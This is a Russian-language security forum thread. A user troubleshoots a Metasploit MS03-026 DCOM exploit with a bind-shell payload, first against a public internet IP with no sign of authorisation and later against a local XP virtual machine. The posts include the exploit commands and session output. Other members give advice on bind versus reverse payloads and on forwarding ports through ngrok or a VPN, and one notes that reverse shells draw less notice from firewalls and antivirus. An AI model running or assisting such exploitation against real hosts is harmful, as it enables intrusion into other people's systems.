• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Нужен белый IP для эксплоита или нет?

wurdalak

Green Team
21.12.2019
18
2
BIT
0
Не прилетает meterpriter сессия создаётся. Нужен белый ip ?
Код:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

msf5 exploit(windows/dcerpc/ms03_026_dcom) >

[*] 93.213.65.23:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] 93.213.65.23:135 - Binding to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...

[*] 93.213.65.23:135 - Bound to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...

[*] 93.213.65.23:135 - Sending exploit ...

[*] Started bind TCP handler against 93.213.65.23:135

[*] Command shell session 1 opened (0.0.0.0:0 -> 93.213.65.23:135) at 2020-10-03 14:57:58 +0700


msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -l


Active sessions

===============


  Id  Name  Type               Information  Connection

  --  ----  ----               -----------  ----------

  1         shell x86/windows               0.0.0.0:0 -> 93.213.65.23:135 (93.213.65.23)


msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i 1

[*] Starting interaction with 1...

shell


[*] Trying to find binary(python) on target machine

[-] Session manipulation failed: undefined method `reverse!' for nil:NilClass ["C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/

ork-5.0.97/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'", "C:/metasploit/apps/pro/ etc...
Подскажите, что не так делаю.
 
А где вы пытайтесь применить эксплоит?
Если вы атакуете машину в локальной сети, то белый ip не нужен.
 
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
 
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
Посмотри в интернете про проброс портов с помощью ngrok. На ютуб канале codeby есть видео про это.
 
Последнее редактирование:
ну да с локалки. с роутера переадресацию на локальную тачку сделал и всё, но получаеться надо впн так ведь?
 
ну да с локалки. с роутера переадресацию на локальную тачку сделал и всё, но получаеться надо впн так ведь?
Мне каюется, что дело может быть в metasploit. Смотрю на вывод ошибки, и думаю, что на машине жертвы что-то не установлено (python судя по ошибке msf) или что-то с ruby на вашей машине, но это врятли.
 
Вроде как должен быть свой статический ip, или vpn с возможностью открытия портов. Подойдет vpn , там можно открыть порты от 1000. Если нужно ниже, то можно там же купить выделенный личный ip, при покупке от полугода. Если временной, на сутки версией пользуетесь, то после использования, нужно закрыть порт, который открыли.
 
Вроде как должен быть свой статический ip, или vpn с возможностью открытия портов. Подойдет vpn , там можно открыть порты от 1000. Если нужно ниже, то можно там же купить выделенный личный ip, при покупке от полугода. Если временной, на сутки версией пользуетесь, то после использования, нужно закрыть порт, который открыли.
А как правильно пробросить все это дело к себе с впн?
 
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
Варианты с белым ip или с использованием ngrok нужны при использовании reverse payload. Когда атакуемая машина, при успешном выполнении эксплоита, сама пытается к нам обратно подключится.

При успешной эксплотации и использовании bind payload атакуемая машина сама открывает у себя порт и ждёт, когда к ней кто-то подключится.

Чаще используют reverse, так как когда атакуемая машина сама подключается куда-то в интернет, фаерволы и антивирусы спокойнее к этому относятся, нежели когда непонятно кто лезет в неё из интернета (плюс надо понимать, что атакуемая машина может не иметь прямой доступ из интрнета, а сидит через шлюз и прочее прочее прочее...)

Вообще там еще есть отличия между windows/shell_bind_tcp и windows/shell/bind_tcp о них можно вот тут почитать
 
Хмм... в локалке на виртуалке с XP абсолютно такой же вывод
Код:
msf5 exploit(windows/dcerpc/ms03_026_dcom) >
[*] 192.168.1.8:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.1.8:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.8[135] ...
[*] 192.168.1.8:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.8[135] ...
[*] 192.168.1.8:135 - Sending exploit ...
[*] Started bind TCP handler against 192.168.1.8:135
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.8:135) at 2020-10-09 15:08:01 +0700

msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions 1
[*] Starting interaction with 1...
тоже IP понулям куда реверсит 0.0.0.0:0 , что за х.......я?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!